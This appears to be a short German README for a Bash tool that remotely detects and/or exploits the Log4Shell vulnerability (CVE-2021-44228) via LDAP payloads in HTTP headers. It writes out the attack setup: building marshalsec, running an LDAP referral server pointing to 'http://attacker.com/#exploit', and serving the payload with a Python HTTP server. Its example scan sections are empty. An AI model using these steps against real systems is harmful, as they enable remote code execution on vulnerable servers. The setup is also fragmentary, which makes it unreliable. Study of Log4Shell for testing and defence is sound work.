
Bash-Skript zur Fernidentifikation der Log4j-Schwachstelle CVE-2021-44228.
Bash-Skript, das es ermöglicht, die Log4shell-Schwachstelle remote zu identifizieren und/oder auszunutzen. Dieses Tool führt verschiedene Tests mit LDAP-Payloads und den Headern X-Api-Version, User-Agent und X-Forwarded-For durch.
mvn clean package -DskipTests && Java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar
marshalsec.jndi.LDAPRefServer 'http://attacker.com/#exploit'
Wir aktivieren einen HTTP-Server python3 -m http.server 8080
Java installiert haben #sudo apt install default-jre
Curl installiert haben #sudo apt-get install curl
Folgende Parameter eingeben:
#Beispiel Scan einer Anwendung im internen Netzwerk:

#Beispiel Scan einer Anwendung im Internet:
